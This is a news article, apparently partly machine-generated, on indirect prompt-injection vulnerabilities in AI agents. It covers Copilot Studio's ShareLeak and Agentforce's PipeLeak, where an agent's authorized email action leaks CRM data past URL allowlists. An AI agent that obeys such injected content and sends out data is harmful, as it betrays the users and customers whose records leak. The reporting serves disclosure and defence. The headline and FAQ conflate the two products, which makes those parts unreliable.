Skip to main content
Microsoft Copilot Studio prompt injection vulnerability, data exfiltration, cybersecurity, AI security patch.

Editorial illustration for Microsoft patches Copilot Studio prompt injection, data still exfiltrated

Microsoft Copilot Studio Vulnerability Exposes Data Leak

Microsoft patches Copilot Studio prompt injection, data still exfiltrated

2 min read

Microsoft has just rolled out a fix for a prompt‑injection flaw in its Copilot Studio platform, yet telemetry shows that sensitive information still slipped out of the system. The patch targets the same class of vulnerabilities that researchers have been flagging across AI‑driven code assistants for months. While the update blocks the most obvious injection paths, the incident raises a broader question: how many indirect routes remain viable after a vendor’s “quick fix”?

Earlier this year, independent labs demonstrated that even tightly controlled URL allowlists could be bypassed, suggesting that surface‑level defenses may not be enough. The latest findings from a team called Capsule add a new twist, showing that a variant of the attack persists despite prior mitigations. Their analysis points to a lingering vector that could keep data flowing to an external endpoint, even after the advertised patch is applied.

This backdrop makes the following statement especially relevant.

Capsule is not the first research team to hit Agentforce with indirect prompt injection. Noma Labs disclosed ForcedLeak (CVSS 9.4) in September 2025, and Salesforce patched that vector by enforcing Trusted URL allowlists. According to Capsule's research, PipeLeak survives that patch through a different channel: email via the agent's authorized tool actions.

Naor Paz, CEO of Capsule Security, told VentureBeat the testing hit no exfiltration limit. "We did not get to any limitation," Paz said. "The agent would just continue to leak all the CRM." Salesforce recommended human-in-the-loop as a mitigation.

"If the human should approve every single operation, it's not really an agent," he told VentureBeat. "It's just a human clicking through the agent's actions." Microsoft patched ShareLeak and assigned a CVE.

Microsoft’s rollout of a fix for CVE‑2026‑21520 shows the company can move quickly once a flaw is reported, yet the fact that data still left Copilot Studio raises questions about the patch’s scope. Capsule Security’s coordination led to a January 15 deployment, and the public disclosure on Wednesday makes the vulnerability transparent, but the assignment of a CVE to an indirect prompt‑injection issue is, by their account, “highly unusual.” That framing hints at a broader uncertainty: does the CVE label reflect a deeper shift in how such bugs are classified, or is it simply a procedural choice? Earlier work by Noma Labs on ForcedLeak (CVSS 9.4) and Salesforce’s URL‑allowlist response demonstrate that similar vectors have been mitigated, yet Capsule notes that PipeLeak survived those defenses.

Whether Microsoft’s patch fully blocks the exfiltration path remains unclear; the lingering data loss suggests residual attack surface. The episode underscores that fixing one entry point may not eliminate all avenues for indirect prompt injection, and further scrutiny of Copilot Studio’s defenses appears warranted.

Further Reading

Common Questions Answered

How did Capsule Security discover the prompt injection vulnerability in Microsoft Copilot Studio?

Capsule Security researchers identified an indirect prompt injection vulnerability that could exfiltrate sensitive data through the agent's authorized tool actions. Their testing revealed that even after Microsoft's patch, data could still potentially leak through alternative channels.

What makes CVE-2026-21520 unique in the context of prompt injection vulnerabilities?

The CVE-2026-21520 is considered highly unusual because it represents an indirect prompt injection issue that was assigned a formal CVE number. The vulnerability demonstrates that even after patching obvious injection paths, potential data exfiltration routes may still exist in AI-driven platforms.

What did Naor Paz, CEO of Capsule Security, reveal about their testing of the Copilot Studio vulnerability?

Naor Paz stated that during their testing, they did not encounter any exfiltration limits, suggesting that the vulnerability could potentially expose significant amounts of sensitive information. This finding underscores the complexity of securing AI-driven code assistants against prompt injection attacks.